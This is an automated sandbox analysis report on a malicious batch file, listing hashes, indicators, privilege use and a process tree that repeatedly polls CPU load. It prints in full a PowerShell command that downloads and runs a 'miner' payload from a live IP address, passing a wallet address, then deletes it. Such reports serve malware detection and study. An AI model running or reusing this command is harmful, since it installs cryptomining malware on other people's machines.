1581804de8f5a5e4d6e0c0a6df326992b874d4d55c4c4d5e795c80f6f1c4c0ad

Analysis

max time kernel
149s
max time network
53s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
01/07/2024, 09:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

267422042222622.bat
Size

521B
MD5

e7bb44f7a40faf04de6eef414aeaac68
SHA1

feab06aa47a6b34a30085726103a58ea2d6ccf77
SHA256

1581804de8f5a5e4d6e0c0a6df326992b874d4d55c4c4d5e795c80f6f1c4c0ad
SHA512

3553e5a1fa4349a75aa0a4a61c833be8ae9d6fa10b3c4da49771e845938585fbd376277f976ff24ad91439be1f32d11ce6270761d7851a959903a6be575a0009

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://94.177.244.107:3000/miner

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	1304	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1304	powershell.exe

Delays execution with timeout.exe 63 IoCs

evasion

pid	Process
1608	timeout.exe
4388	timeout.exe
544	timeout.exe
3124	timeout.exe
2708	timeout.exe
516	timeout.exe
4408	timeout.exe
3796	timeout.exe
4896	timeout.exe
2880	timeout.exe
548	timeout.exe
4916	timeout.exe
380	timeout.exe
3764	timeout.exe
856	timeout.exe
2536	timeout.exe
1504	timeout.exe
4532	timeout.exe
3052	timeout.exe
1796	timeout.exe
1984	timeout.exe
4452	timeout.exe
540	timeout.exe
1808	timeout.exe
2204	timeout.exe
1888	timeout.exe
4964	timeout.exe
1524	timeout.exe
1348	timeout.exe
3280	timeout.exe
5012	timeout.exe
872	timeout.exe
4804	timeout.exe
3576	timeout.exe
4912	timeout.exe
2120	timeout.exe
1904	timeout.exe
564	timeout.exe
5076	timeout.exe
3332	timeout.exe
4932	timeout.exe
2396	timeout.exe
400	timeout.exe
2576	timeout.exe
932	timeout.exe
4300	timeout.exe
5020	timeout.exe
2184	timeout.exe
1428	timeout.exe
636	timeout.exe
3368	timeout.exe
4884	timeout.exe
868	timeout.exe
3708	timeout.exe
4120	timeout.exe
3892	timeout.exe
3588	timeout.exe
5004	timeout.exe
3480	timeout.exe
1800	timeout.exe
4348	timeout.exe
1684	timeout.exe
4508	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1304	powershell.exe
1304	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeIncreaseQuotaPrivilege	924	WMIC.exe
Token: SeSecurityPrivilege	924	WMIC.exe
Token: SeTakeOwnershipPrivilege	924	WMIC.exe
Token: SeLoadDriverPrivilege	924	WMIC.exe
Token: SeSystemProfilePrivilege	924	WMIC.exe
Token: SeSystemtimePrivilege	924	WMIC.exe
Token: SeProfSingleProcessPrivilege	924	WMIC.exe
Token: SeIncBasePriorityPrivilege	924	WMIC.exe
Token: SeCreatePagefilePrivilege	924	WMIC.exe
Token: SeBackupPrivilege	924	WMIC.exe
Token: SeRestorePrivilege	924	WMIC.exe
Token: SeShutdownPrivilege	924	WMIC.exe
Token: SeDebugPrivilege	924	WMIC.exe
Token: SeSystemEnvironmentPrivilege	924	WMIC.exe
Token: SeRemoteShutdownPrivilege	924	WMIC.exe
Token: SeUndockPrivilege	924	WMIC.exe
Token: SeManageVolumePrivilege	924	WMIC.exe
Token: 33	924	WMIC.exe
Token: 34	924	WMIC.exe
Token: 35	924	WMIC.exe
Token: 36	924	WMIC.exe
Token: SeIncreaseQuotaPrivilege	924	WMIC.exe
Token: SeSecurityPrivilege	924	WMIC.exe
Token: SeTakeOwnershipPrivilege	924	WMIC.exe
Token: SeLoadDriverPrivilege	924	WMIC.exe
Token: SeSystemProfilePrivilege	924	WMIC.exe
Token: SeSystemtimePrivilege	924	WMIC.exe
Token: SeProfSingleProcessPrivilege	924	WMIC.exe
Token: SeIncBasePriorityPrivilege	924	WMIC.exe
Token: SeCreatePagefilePrivilege	924	WMIC.exe
Token: SeBackupPrivilege	924	WMIC.exe
Token: SeRestorePrivilege	924	WMIC.exe
Token: SeShutdownPrivilege	924	WMIC.exe
Token: SeDebugPrivilege	924	WMIC.exe
Token: SeSystemEnvironmentPrivilege	924	WMIC.exe
Token: SeRemoteShutdownPrivilege	924	WMIC.exe
Token: SeUndockPrivilege	924	WMIC.exe
Token: SeManageVolumePrivilege	924	WMIC.exe
Token: 33	924	WMIC.exe
Token: 34	924	WMIC.exe
Token: 35	924	WMIC.exe
Token: 36	924	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3316	WMIC.exe
Token: SeSecurityPrivilege	3316	WMIC.exe
Token: SeTakeOwnershipPrivilege	3316	WMIC.exe
Token: SeLoadDriverPrivilege	3316	WMIC.exe
Token: SeSystemProfilePrivilege	3316	WMIC.exe
Token: SeSystemtimePrivilege	3316	WMIC.exe
Token: SeProfSingleProcessPrivilege	3316	WMIC.exe
Token: SeIncBasePriorityPrivilege	3316	WMIC.exe
Token: SeCreatePagefilePrivilege	3316	WMIC.exe
Token: SeBackupPrivilege	3316	WMIC.exe
Token: SeRestorePrivilege	3316	WMIC.exe
Token: SeShutdownPrivilege	3316	WMIC.exe
Token: SeDebugPrivilege	3316	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3316	WMIC.exe
Token: SeRemoteShutdownPrivilege	3316	WMIC.exe
Token: SeUndockPrivilege	3316	WMIC.exe
Token: SeManageVolumePrivilege	3316	WMIC.exe
Token: 33	3316	WMIC.exe
Token: 34	3316	WMIC.exe
Token: 35	3316	WMIC.exe
Token: 36	3316	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3352 wrote to memory of 1304	3352	cmd.exe	82
PID 3352 wrote to memory of 1304	3352	cmd.exe	82
PID 3352 wrote to memory of 3664	3352	cmd.exe	83
PID 3352 wrote to memory of 3664	3352	cmd.exe	83
PID 3664 wrote to memory of 924	3664	cmd.exe	84
PID 3664 wrote to memory of 924	3664	cmd.exe	84
PID 3352 wrote to memory of 1428	3352	cmd.exe	86
PID 3352 wrote to memory of 1428	3352	cmd.exe	86
PID 3352 wrote to memory of 4884	3352	cmd.exe	87
PID 3352 wrote to memory of 4884	3352	cmd.exe	87
PID 4884 wrote to memory of 3316	4884	cmd.exe	88
PID 4884 wrote to memory of 3316	4884	cmd.exe	88
PID 3352 wrote to memory of 400	3352	cmd.exe	89
PID 3352 wrote to memory of 400	3352	cmd.exe	89
PID 3352 wrote to memory of 2108	3352	cmd.exe	90
PID 3352 wrote to memory of 2108	3352	cmd.exe	90
PID 2108 wrote to memory of 2000	2108	cmd.exe	91
PID 2108 wrote to memory of 2000	2108	cmd.exe	91
PID 3352 wrote to memory of 1608	3352	cmd.exe	92
PID 3352 wrote to memory of 1608	3352	cmd.exe	92
PID 3352 wrote to memory of 4916	3352	cmd.exe	93
PID 3352 wrote to memory of 4916	3352	cmd.exe	93
PID 4916 wrote to memory of 1808	4916	cmd.exe	94
PID 4916 wrote to memory of 1808	4916	cmd.exe	94
PID 3352 wrote to memory of 4896	3352	cmd.exe	96
PID 3352 wrote to memory of 4896	3352	cmd.exe	96
PID 3352 wrote to memory of 4408	3352	cmd.exe	97
PID 3352 wrote to memory of 4408	3352	cmd.exe	97
PID 4408 wrote to memory of 5092	4408	cmd.exe	98
PID 4408 wrote to memory of 5092	4408	cmd.exe	98
PID 3352 wrote to memory of 1524	3352	cmd.exe	99
PID 3352 wrote to memory of 1524	3352	cmd.exe	99
PID 3352 wrote to memory of 4200	3352	cmd.exe	100
PID 3352 wrote to memory of 4200	3352	cmd.exe	100
PID 4200 wrote to memory of 3092	4200	cmd.exe	101
PID 4200 wrote to memory of 3092	4200	cmd.exe	101
PID 3352 wrote to memory of 3576	3352	cmd.exe	102
PID 3352 wrote to memory of 3576	3352	cmd.exe	102
PID 3352 wrote to memory of 3036	3352	cmd.exe	105
PID 3352 wrote to memory of 3036	3352	cmd.exe	105
PID 3036 wrote to memory of 380	3036	cmd.exe	106
PID 3036 wrote to memory of 380	3036	cmd.exe	106
PID 3352 wrote to memory of 4388	3352	cmd.exe	108
PID 3352 wrote to memory of 4388	3352	cmd.exe	108
PID 3352 wrote to memory of 2384	3352	cmd.exe	109
PID 3352 wrote to memory of 2384	3352	cmd.exe	109
PID 2384 wrote to memory of 3860	2384	cmd.exe	110
PID 2384 wrote to memory of 3860	2384	cmd.exe	110
PID 3352 wrote to memory of 2880	3352	cmd.exe	111
PID 3352 wrote to memory of 2880	3352	cmd.exe	111
PID 3352 wrote to memory of 3404	3352	cmd.exe	113
PID 3352 wrote to memory of 3404	3352	cmd.exe	113
PID 3404 wrote to memory of 1996	3404	cmd.exe	114
PID 3404 wrote to memory of 1996	3404	cmd.exe	114
PID 3352 wrote to memory of 2536	3352	cmd.exe	115
PID 3352 wrote to memory of 2536	3352	cmd.exe	115
PID 3352 wrote to memory of 4592	3352	cmd.exe	116
PID 3352 wrote to memory of 4592	3352	cmd.exe	116
PID 4592 wrote to memory of 1020	4592	cmd.exe	117
PID 4592 wrote to memory of 1020	4592	cmd.exe	117
PID 3352 wrote to memory of 544	3352	cmd.exe	119
PID 3352 wrote to memory of 544	3352	cmd.exe	119
PID 3352 wrote to memory of 2396	3352	cmd.exe	120
PID 3352 wrote to memory of 2396	3352	cmd.exe	120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\267422042222622.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://94.177.244.107:3000/miner', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:924
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5092
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3092
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3860
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1996
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4328
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3572
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1364
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1944
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4344
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1180
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3576
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4588
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4576
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:544
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3456
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4092
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4572
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3164
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1344
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1312
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3124
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5060
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2476
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2152
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3996
